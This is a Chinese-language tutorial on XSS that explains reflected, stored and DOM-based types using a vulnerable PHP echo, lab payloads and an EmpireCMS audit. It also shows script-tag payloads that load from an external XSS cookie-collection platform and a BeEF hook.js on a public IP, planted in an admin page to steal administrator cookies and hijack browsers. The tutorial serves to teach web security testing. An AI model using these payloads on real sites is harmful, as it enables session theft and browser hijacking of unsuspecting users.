WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOMBEEF-XSS

XSS跨站脚本攻击技术（一）

XSS的定义

XSS攻击，全称为跨站脚本攻击，是指攻击者通过在网页中插入恶意脚本代码，当用户浏览该网页时，恶意脚本会被执行，从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息，如Cookie、会话令牌等，或者诱导用户执行不安全的操作，如点击恶意链接、下载恶意软件等。

XSS的原理

它是由前端JavaScript代码造成的，具体来说，是Web应用程序在处理用户输入时未能充分验证和过滤，导致恶意脚本被注入到网页中并由用户的浏览器执行。这种漏洞通常发生在动态网页中，其中JavaScript代码用于与服务器进行交互、更新页面内容或处理用户输入。由于JavaScript代码在用户的浏览器中执行，因此攻击者可以利用这一特性来构造恶意脚本，从而控制用户的浏览器进行恶意操作。

XSS的危害

理论上，只要JavaScript功能能够实现的操作，XSS攻击都有可能加以利用并实现。如：

实施网络钓鱼，包括窃取各类用户账号信息，严重威胁用户的信息安全。
窃取浏览器中用户的cookies资料，进而获取用户的隐私信息，甚至利用用户身份对网站执行非法操作。
劫持用户（浏览器）会话，使攻击者能够执行任意操作，如非法转账、发表日志、发送邮件等，对用户造成直接的经济损失或声誉损害。
强制弹出广告页面、刷流量等，干扰用户的正常使用体验，同时损害网站的正常运营。
网页挂马，将恶意软件或病毒植入用户电脑，进一步危害用户的系统安全。
进行恶意操作，如任意篡改页面信息、删除文章等，破坏网站内容的完整性和真实性。
发起大量的客户端攻击，如DDoS攻击，影响网站的正常访问和稳定性。
获取客户端信息，如用户的浏览历史、真实IP、开放端口等，为进一步的攻击提供情报支持。
控制受害者机器向其他网站发起攻击，形成攻击链，扩大攻击范围。
结合其他漏洞，如CSRF漏洞，实施更为复杂的攻击，提升攻击的成功率和危害性。
提升用户权限，包括进一步渗透网站，获取更高级别的访问权限和数据访问能力。
传播跨站脚本蠕虫，实现自动化的攻击传播和感染，造成更广泛的网络安全威胁。

XSS攻击的主要类型

反射型XSS

定义：反射型XSS，也称为非持久型或参数型XSS，是指攻击者通过构造包含恶意脚本的URL参数，当用户点击该链接时，恶意脚本会被回显到网页上并执行。

特点：反射型XSS攻击通常发生在用户与Web应用程序进行交互时，如搜索、提交表单等。由于恶意脚本是通过URL参数传递的，因此其生命周期较短，一旦用户关闭页面或清除浏览器缓存，恶意脚本就会消失。

示例：

有这么一个情况，如后端接受GET请求中的变量，并在前端直接输出该变量，

<?php
// 接收GET请求中的'x'参数
$code = $_GET['x'];// 直接输出变量，未进行任何过滤或转义
echo $code;
?>

正常访问：

当你使用正常参数访问该页面时，比如：x=1123

x接收到值会在页面中显示，假如传输x的值改成JavaScript的弹窗代码：

x=<script>alert(1)</script>

查看源代码，发现显示内容会出现在审查元素中：

按正常来说，应该显示<script>alert(1)</script>，但是这里显示空白。是因为这段代码被当成JavaScript代码去执行了。执行出的效果就是弹窗。
在产生过程中，有一个输入的值，还有个输出的值。这就是跨站产生的基本原理。但这种漏洞是一次性的，只有访问构造的地址http://127.0.0.1:8081/web/mysql/xss.php?x=<script>alert(1)</script>才可以触发此类漏洞。必须构造给别人，让别人访问，才能触发漏洞。

在这里，“反射”指的是恶意脚本被服务器接收后，几乎立即被“反射”回用户的浏览器，就像一面镜子一样。

存储型XSS（攻击代码被写进了数据库里）

定义：存储型XSS，也称为持久型XSS，是指攻击者将包含恶意脚本的内容提交到Web应用程序中，并永久存储在服务器上。当其他用户浏览该内容时，恶意脚本会被执行。

特点：存储型XSS攻击的危害性较大，因为恶意脚本被永久存储在服务器上，可以持续影响所有访问该内容的用户。此外，攻击者还可以利用存储型XSS攻击进行更复杂的攻击，如传播跨站脚本蠕虫、构建僵尸网络等。

危害：存储型XSS可能导致用户信息泄露、账户劫持、恶意软件传播等严重后果。攻击者可以利用窃取的用户Cookie进行会话劫持，或者诱导用户执行不安全的操作，如输入敏感信息、下载恶意软件等。安全产商一般只会接受存储型XSS，不会接受反射型XSS（太鸡肋）。

示例：

场景描述

假设有一个在线留言板应用，允许用户提交留言并显示在网页上。这些留言被存储在服务器的数据库中，当用户访问留言板页面时，服务器会从数据库中检索留言并显示在网页上。

攻击过程

恶意输入：
攻击者在留言框中输入一段包含恶意脚本的留言，例如：<script>alert('恶意代码执行!');</script>。
攻击者提交这段留言。
存储恶意代码：
服务器接收到这段留言后，未进行充分的验证或过滤，就将其存储在数据库中。
反射恶意代码：
当其他用户访问留言板页面时，服务器从数据库中检索留言，并将其嵌入到HTML页面中返回给用户。
由于恶意代码被直接嵌入到页面中，当用户的浏览器解析这段HTML时，会执行其中的恶意脚本。
攻击结果：
用户的浏览器弹出一个警告框，显示“恶意代码执行!”。
这只是恶意脚本的一个简单示例，实际攻击中，恶意脚本可能会窃取用户的敏感信息、执行未经授权的操作、重定向用户到恶意网站等。

DOM型XSS

定义：DOM型XSS是指攻击者通过构造特殊URL或利用网页功能发送恶意代码请求，当受害者浏览器处理这些请求时，会修改DOM树并执行恶意脚本。DOM型不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性也属于反射型。所以DOM型xss取决于输出位置，并不取决于输出环境，因此DOM型xss既有可能是反射型的，也有可能是存储型的

特点：与反射型和存储型XSS不同，DOM型XSS的攻击载荷是在受害者浏览器本地执行的。因此，其相对难以通过传统的输入验证和过滤方法进行防御。此外，DOM型XSS攻击通常与Web应用程序的具体实现细节相关，因此其攻击方式和防御措施也因人而异。

示例：pikachu靶场-DOM型，代码如下

点击click me后， F12查看具体情况，可以看出输入内容会构造一个a标签，并将输入内容作为参数href的值，放在id=dom的容器里

而把而已代码拼接到了a标签里面，尝试构造闭合触发弹窗

#" onclick="alert('xss')">

真实案例和XSS平台

1. 反射型实例-UA查询平台数据输出

平台：useragent.openadmintools.com

访问这个平台，可以发现他抓取了访问者的浏览器信息，重新进行访问，抓包，修改数据包UA头。

数据包发送，就可以看到浏览器弹窗。

但是这类漏洞构成危害不大。因为这个需要在UA头中修改，那么要怎么发给别人。别人访问的时候又不会修改UA头再去访问。

反射型xss的漏洞不好利用的原因：

　　①让对方去访问构造地址；

　　②对方是网站管理员，获取其登录的cookies信息；

　　③浏览器会自动过滤xss的攻击；

2. 存储型实例-订单系统CMS权限获取

① 前台填写信息（包含了XSS代码），下订单；

② XSS代码被插入到了数据库；

③ 登录后台进行订单查看时，js代码被执行，弹出js执行代码的窗口，这就形成了xss攻击。

进行留言，在留言上写上payload

那么如何获取管理员的cookie呢？

xss利用平台：网上找或者自己搭建

（1）网上找的平台，注册一个账号：比如，https://xss.pt/xss.php

① 创建项目，然后进行功能选择，查看代码

② 复制一个代码：<sCRiPt sRC=//xss.pt/X8Vz></sCrIpT>

③ 将代码从目标网站的前台写入

④ 等待目标网站的管理员访问，在下面等待cookie的接收

回到xss平台

比如对后台admin/admin.php?uid=3进行访问，抓包。将获得的cookie信息复制到数据包中。

但是这个cookie不能进行登录，因为这个平台获取到的cookie信息不完整，在正常登录中cookie中还有phpsessid的值，未获取到；
这个网站采用的不是cookie验证，而是phpsessid进行验证，所以无法登录后台。通常，有的网站不止使用cookie，还会使用phpsessid、httponly等进行登录保护。

（2）自己搭建xss利用平台（BeEF平台）

搭建：https://blog.csdn.net/qq_40624810/article/details/110958036

kali安装docker：https://blog.csdn.net/m0_67844671/article/details/132872790

安装BeEF：Beef-Xss 浏览器攻击框架的使用_docker安装beef-xss-CSDN博客

安装完成后，访问http://192.168.132.130:3000/ui/panel

默认账号密码beef,beef

在BeEF网站下面有一个hook.js文件，只要加载了这个地址，就会劫持这个浏览器。
将xss跨站代码写入到登录成功的文件，比如admin/index.php文件
<script src="http://47.100.167.248:3000/hook.js"></script> //注意IP地址改成自己beef的ip
这个平台也可以获取cookie，跳转，下载，钓鱼，伪装成flash。

3.DOM型实例-EmpireCMS前端页面审计

DOM类型的全都是前端的代码，所以基本上都是白盒审计
在upload/e/Viewimg/index.html 发现关键代码：
if(Request("url")!=0){
document.write("<a title=\"点击观看完整的图片...\" href=\""+Request("url")+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");
}

追踪request函数

简单来说，这个request函数就是用来接收URL的地址

那么要怎么构造他呢？

访问地址http://127.0.0.1:8103/e/Viewimg/index.html

测试：http://127.0.0.1:8103/e/Viewimg/index.html?url=1

url的参数1在路径访问时并没有被当做参数，而是直接被当做文件名访问，那么应该怎么触发跨站呢？
http://127.0.0.1:8103/e/Viewimg/index.html?url=javascript:alert(1)
这样子构造在源代码中
document.write("<a title=\"点击观看完整的图片...\" href=\""+javascript:alert(1)+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");

点击后的地址进行了弹窗：即这个地址http://127.0.0.1:8103/e/Viewimg/javascript:alert(1)执行了js代码